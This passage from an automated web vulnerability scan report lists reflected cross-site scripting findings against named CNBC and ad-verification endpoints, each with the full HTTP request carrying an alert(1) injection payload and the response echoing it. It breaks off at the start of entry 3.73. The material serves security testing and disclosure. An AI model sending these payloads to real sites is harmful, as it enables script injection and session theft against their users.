User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=81B90065048D4370292026025CE18CDC; Path=/
Content-Type: text/javascript
Date: Tue, 06 Sep 2011 15:05:42 GMT
Connection: close


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=144510c5"-alert(1)-"dd817178b4e&pubId=4749&campId=176996",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   asid : "gsrdhvt9"
};

(function(){var N="3.12";var v=(adsafeVisParams.debug==="true");var n=2000;var
...[SNIP]...

3.61. http://pixel.adsafeprotected.com/jspix [campId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The value of the campId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload da845"-alert(1)-"880f48e2e1c was submitted in the campId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jspix?anId=144&pubId=4749&campId=176996da845"-alert(1)-"880f48e2e1c HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=35EB1F19FAC898AF05DFBC3B925C5071; Path=/
Content-Type: text/javascript
Date: Tue, 06 Sep 2011 15:05:42 GMT
Connection: close


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=144&pubId=4749&campId=176996da845"-alert(1)-"880f48e2e1c",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   asid : "gsrdhw0z"
};

(function(){var N="3.12";var v=(adsafeVisParams.debug==="true");var n=2000;var H={INFO:"info",LOG:"log",
...[SNIP]...

3.62. http://pixel.adsafeprotected.com/jspix [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 29f17"-alert(1)-"0d89877785d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jspix?anId=144&pubId=4749&campId=176996&29f17"-alert(1)-"0d89877785d=1 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=FB69FF41E9D06173F3B7D3D9C3729F77; Path=/
Content-Type: text/javascript
Date: Tue, 06 Sep 2011 15:05:42 GMT
Connection: close


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=144&pubId=4749&campId=176996&29f17"-alert(1)-"0d89877785d=1",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   asid : "gsrdhw3w"
};

(function(){var N="3.12";var v=(adsafeVisParams.debug==="true");var n=2000;var H={INFO:"info",LOG:"log
...[SNIP]...

3.63. http://pixel.adsafeprotected.com/jspix [pubId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The value of the pubId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b063c"-alert(1)-"1e31f51b3df was submitted in the pubId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jspix?anId=144&pubId=4749b063c"-alert(1)-"1e31f51b3df&campId=176996 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=15F3A88A83B937D289F19131BE7257D4; Path=/
Content-Type: text/javascript
Date: Tue, 06 Sep 2011 15:05:41 GMT
Connection: close


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=144&pubId=4749b063c"-alert(1)-"1e31f51b3df&campId=176996",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   asid : "gsrdhvsx"
};

(function(){var N="3.12";var v=(adsafeVisParams.debug==="true");var n=2000;var H={INFO:"in
...[SNIP]...

3.64. http://quote.cnbc.com/quote-html-webservice/quote.htm [&symbols parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://quote.cnbc.com
Path:   /quote-html-webservice/quote.htm

Issue detail

The value of the &symbols request parameter is copied into the HTML document as plain text between tags. The payload 4f61d<img%20src%3da%20onerror%3dalert(1)>e62cc5d307c was submitted in the &symbols parameter. This input was echoed as 4f61d<img src=a onerror=alert(1)>e62cc5d307c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quote-html-webservice/quote.htm?&symbols=.GDAXI|4f61d<img%20src%3da%20onerror%3dalert(1)>e62cc5d307c&requestMethod=quick&noform=1&realtime=1&client=flexQuote&output=json&random=1315338996212 HTTP/1.1
Host: quote.cnbc.com
Proxy-Connection: keep-alive
Referer: http://quote.cnbc.com/quoteproxy.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; __qseg=Q_D; s_nr=1315338989816; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSearch%25257CNews%25257CAllT%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257B%252520cnbc_multionclick%252528%252527http%25253A//www.cnbc.com/%252527%252529%25253B%25257D%2526oidt%253D2%2526ot%253DDIV

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/x-json;charset=UTF-8
Content-Language: en-US
Date: Tue, 06 Sep 2011 14:57:30 GMT
Via: 1.1 C aicache6
Content-Length: 980
X-Aicache-OS: 64.210.195.136:80
Connection: Keep-Alive
Keep-Alive: max=20
Expires: Tue, 06 Sep 2011 14:57:35 GMT


{"QuickQuoteResult":{"QuickQuote":[{"change_pct":"-1.61","last":"5161.68","curmktstatus":"REG_MKT","change":"-84.50","reg_last_time":"2011-09-06T16:42:29.000+0200","timeZone":"ECT","last_time":"
...[SNIP]...
"false","altSymbol":"DAX-XE","volume":"189930268","todays_closing":"0.0","previous_day_closing":"5246.18","high":"5332.11","low":"5150.05","comments":"ILX","last_time_msec":"1315320149000"},{"symbol":"4F61D<IMG SRC=A ONERROR=ALERT(1)>E62CC5D307C","code":"1"}],"xmlns:xsi":"http://www.w3.org/2001/XMLSchema-instance","xmlns":"http://quote.cnbc.com/services/MultiQuote/2006"}}

3.65. http://search.cnbc.com/main.do [keywords parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.cnbc.com
Path:   /main.do

Issue detail

The value of the keywords request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4ae86</script><script>alert(1)</script>06ada94b268662ae5 was submitted in the keywords parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /main.do?target=all&keywords=xss4ae86</script><script>alert(1)</script>06ada94b268662ae5&categories=exclude&searchboxinput=xss HTTP/1.1
Host: search.cnbc.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
Cache-Control: max-age=0
Origin: http://www.cnbc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; TZM=-300; adops_master_kvs=; snas_noinfo=1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1315339005443; __qseg=Q_D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:57:47 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Type: text/html
Via: 1.1 C aicache6
Content-Length: 84843
X-Aicache-OS: 64.210.194.245:80
Connection: close
Expires: Tue, 06 Sep 2011 15:07:47 GMT

<html>
<head>
<!-- Adding velocity template for meta tags -->

<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta name="description" content="CNBC Search, xss4ae86</script>
...[SNIP]...
<script>

keyWordParam = "xss4ae86</script><script>alert(1)</script>06ada94b268662ae5";
keyWordParam = keyWordParam.replace(/&quot;/g,'"');
document.getElementById('txtBox').value = keyWordParam;

</script>
...[SNIP]...

3.66. http://search.cnbc.com/main.do [keywords parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.cnbc.com
Path:   /main.do

Issue detail

The value of the keywords request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86fbc</script><script>alert(1)</script>0a30be6899a was submitted in the keywords parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /main.do?keywords=xss86fbc</script><script>alert(1)</script>0a30be6899a&sort=date&minimumrelevance=0.2&topics=slideshows&pubtime=0&pubfreq=h HTTP/1.1
Host: search.cnbc.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; TZM=-300; snas_noinfo=1; s_cc=true; adops_master_kvs=; __qseg=Q_D; s_nr=1315339031577; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSearch%25257CAll%25257CAllT%2526pidt%253D1%2526oid%253Djavascript%25253AloadParamURL%252528keyWordParam%25252C%252527date%252527%25252C0%25252C%252527h%252527%25252C%252527%252526topics%25253Dslideshows%252527%252529%25253B%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:57:51 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Type: text/html
Via: 1.1 C aicache6
Content-Length: 85231
X-Aicache-OS: 64.210.194.247:80
Connection: close
Expires: Tue, 06 Sep 2011 15:07:51 GMT

<html>
<head>
<!-- Adding velocity template for meta tags -->

<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta name="description" content="CNBC Search, xss86fbc</script>
...[SNIP]...
<script>

keyWordParam = "xss86fbc</script><script>alert(1)</script>0a30be6899a";
keyWordParam = keyWordParam.replace(/&quot;/g,'"');
document.getElementById('txtBox').value = keyWordParam;

</script>
...[SNIP]...

3.67. http://search.cnbc.com/main.do [keywords parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.cnbc.com
Path:   /main.do

Issue detail

The value of the keywords request parameter is copied into the HTML document as text between TITLE tags. The payload 8364e</title><script>alert(1)</script>07d9d84cea13b502c was submitted in the keywords parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /main.do?target=all&keywords=xss8364e</title><script>alert(1)</script>07d9d84cea13b502c&categories=exclude&searchboxinput=xss HTTP/1.1
Host: search.cnbc.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
Cache-Control: max-age=0
Origin: http://www.cnbc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; TZM=-300; adops_master_kvs=; snas_noinfo=1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1315339005443; __qseg=Q_D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:57:51 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Type: text/html
Via: 1.1 C aicache6
Content-Length: 84839
X-Aicache-OS: 64.210.193.97:80
Connection: close
Expires: Tue, 06 Sep 2011 15:07:51 GMT

<html>
<head>
<!-- Adding velocity template for meta tags -->

<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta name="description" content="CNBC Search, xss8364e</title><
...[SNIP]...
<title>xss8364e</title><script>alert(1)</script>07d9d84cea13b502c - CNBC</title>
...[SNIP]...

3.68. http://search.cnbc.com/main.do [keywords parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.cnbc.com
Path:   /main.do

Issue detail

The value of the keywords request parameter is copied into the HTML document as text between TITLE tags. The payload fda4e</title><script>alert(1)</script>b2e6faa4271 was submitted in the keywords parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main.do?keywords=xssfda4e</title><script>alert(1)</script>b2e6faa4271&sort=date&minimumrelevance=0.2&topics=slideshows&pubtime=0&pubfreq=h HTTP/1.1
Host: search.cnbc.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; TZM=-300; snas_noinfo=1; s_cc=true; adops_master_kvs=; __qseg=Q_D; s_nr=1315339031577; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSearch%25257CAll%25257CAllT%2526pidt%253D1%2526oid%253Djavascript%25253AloadParamURL%252528keyWordParam%25252C%252527date%252527%25252C0%25252C%252527h%252527%25252C%252527%252526topics%25253Dslideshows%252527%252529%25253B%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:57:54 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Type: text/html
Via: 1.1 C aicache6
Content-Length: 85227
X-Aicache-OS: 64.210.194.245:80
Connection: close
Expires: Tue, 06 Sep 2011 15:07:54 GMT

<html>
<head>
<!-- Adding velocity template for meta tags -->

<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta name="description" content="CNBC Search, xssfda4e</title><
...[SNIP]...
<title>xssfda4e</title><script>alert(1)</script>b2e6faa4271 - CNBC</title>
...[SNIP]...

3.69. http://search.cnbc.com/main.do [pubfreq parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.cnbc.com
Path:   /main.do

Issue detail

The value of the pubfreq request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8cf8c"><script>alert(1)</script>c96a087baf9 was submitted in the pubfreq parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main.do?keywords=xss&sort=date&minimumrelevance=0.2&topics=slideshows&pubtime=0&pubfreq=h8cf8c"><script>alert(1)</script>c96a087baf9 HTTP/1.1
Host: search.cnbc.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; TZM=-300; snas_noinfo=1; s_cc=true; adops_master_kvs=; __qseg=Q_D; s_nr=1315339031577; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSearch%25257CAll%25257CAllT%2526pidt%253D1%2526oid%253Djavascript%25253AloadParamURL%252528keyWordParam%25252C%252527date%252527%25252C0%25252C%252527h%252527%25252C%252527%252526topics%25253Dslideshows%252527%252529%25253B%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:57:59 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Type: text/html
Via: 1.1 C aicache6
Content-Length: 85676
X-Aicache-OS: 64.210.194.246:80
Connection: close
Expires: Tue, 06 Sep 2011 15:07:59 GMT

<html>
<head>
<!-- Adding velocity template for meta tags -->

<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta name="description" content="CNBC Search, xss">
<meta name=
...[SNIP]...
e="keywords" type="text" style="width:100px" height="22px" class="search_input" onkeypress="javascript: return cnbc_searchbox_submitenter(document.getElementById('txtBox').value,'date',formatParam,0,'h8cf8c"><script>alert(1)</script>c96a087baf9',event);" maxlength="100"/>
...[SNIP]...

3.70. http://search.cnbc.com/main.do [pubfreq parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.cnbc.com
Path:   /main.do

Issue detail

The value of the pubfreq request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f82d"%3balert(1)//40cf5dbf8a was submitted in the pubfreq parameter. This input was echoed as 4f82d";alert(1)//40cf5dbf8a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /main.do?keywords=xss&sort=date&minimumrelevance=0.2&topics=slideshows&pubtime=0&pubfreq=h4f82d"%3balert(1)//40cf5dbf8a HTTP/1.1
Host: search.cnbc.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; TZM=-300; snas_noinfo=1; s_cc=true; adops_master_kvs=; __qseg=Q_D; s_nr=1315339031577; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSearch%25257CAll%25257CAllT%2526pidt%253D1%2526oid%253Djavascript%25253AloadParamURL%252528keyWordParam%25252C%252527date%252527%25252C0%25252C%252527h%252527%25252C%252527%252526topics%25253Dslideshows%252527%252529%25253B%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:58:00 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Type: text/html
Via: 1.1 C aicache6
Content-Length: 85436
X-Aicache-OS: 64.210.194.247:80
Connection: close
Expires: Tue, 06 Sep 2011 15:08:00 GMT

<html>
<head>
<!-- Adding velocity template for meta tags -->

<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta name="description" content="CNBC Search, xss">
<meta name=
...[SNIP]...
<script>
search_GetPagination_Clientside(0,search_PagLinks,linksdisplay,keyWordParam,1,"date",formatParam,0,"h4f82d";alert(1)//40cf5dbf8a");
display_searchPageResults(0,10,1,keyWordParam);
</script>
...[SNIP]...

3.71. http://search.cnbc.com/main.do [sort parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.cnbc.com
Path:   /main.do

Issue detail

The value of the sort request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa5fc"%3balert(1)//d4e309e7b5c was submitted in the sort parameter. This input was echoed as aa5fc";alert(1)//d4e309e7b5c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /main.do?keywords=xss&sort=dateaa5fc"%3balert(1)//d4e309e7b5c&minimumrelevance=0.2&topics=slideshows&pubtime=0&pubfreq=h HTTP/1.1
Host: search.cnbc.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; TZM=-300; snas_noinfo=1; s_cc=true; adops_master_kvs=; __qseg=Q_D; s_nr=1315339031577; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSearch%25257CAll%25257CAllT%2526pidt%253D1%2526oid%253Djavascript%25253AloadParamURL%252528keyWordParam%25252C%252527date%252527%25252C0%25252C%252527h%252527%25252C%252527%252526topics%25253Dslideshows%252527%252529%25253B%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:57:57 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Type: text/html
Via: 1.1 C aicache6
Content-Length: 85675
X-Aicache-OS: 64.210.194.247:80
Connection: close
Expires: Tue, 06 Sep 2011 15:07:57 GMT

<html>
<head>
<!-- Adding velocity template for meta tags -->

<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta name="description" content="CNBC Search, xss">
<meta name=
...[SNIP]...
<script>
search_GetPagination_Clientside(0,search_PagLinks,linksdisplay,keyWordParam,1,"dateaa5fc";alert(1)//d4e309e7b5c",formatParam,0,"h");
display_searchPageResults(0,10,1,keyWordParam);
</script>
...[SNIP]...

3.72. http://search.cnbc.com/main.do [sort parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.cnbc.com
Path:   /main.do

Issue detail

The value of the sort request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87310"><script>alert(1)</script>44b2f4d8132 was submitted in the sort parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main.do?keywords=xss&sort=date87310"><script>alert(1)</script>44b2f4d8132&minimumrelevance=0.2&topics=slideshows&pubtime=0&pubfreq=h HTTP/1.1
Host: search.cnbc.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; TZM=-300; snas_noinfo=1; s_cc=true; adops_master_kvs=; __qseg=Q_D; s_nr=1315339031577; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSearch%25257CAll%25257CAllT%2526pidt%253D1%2526oid%253Djavascript%25253AloadParamURL%252528keyWordParam%25252C%252527date%252527%25252C0%25252C%252527h%252527%25252C%252527%252526topics%25253Dslideshows%252527%252529%25253B%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:57:55 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Type: text/html
Via: 1.1 C aicache6
Content-Length: 86020
X-Aicache-OS: 64.210.194.246:80
Connection: close
Expires: Tue, 06 Sep 2011 15:07:55 GMT

<html>
<head>
<!-- Adding velocity template for meta tags -->

<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta name="description" content="CNBC Search, xss">
<meta name=
...[SNIP]...
ut id="txtBox" name="keywords" type="text" style="width:100px" height="22px" class="search_input" onkeypress="javascript: return cnbc_searchbox_submitenter(document.getElementById('txtBox').value,'date87310"><script>alert(1)</script>44b2f4d8132',formatParam,0,'h',event);" maxlength="100"/>
...[SNIP]...

3.73. http://serve.directdigitalllc.com/serve.php [click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://serve.directdigitalllc.com
Path:   /serve.php

Issue detail

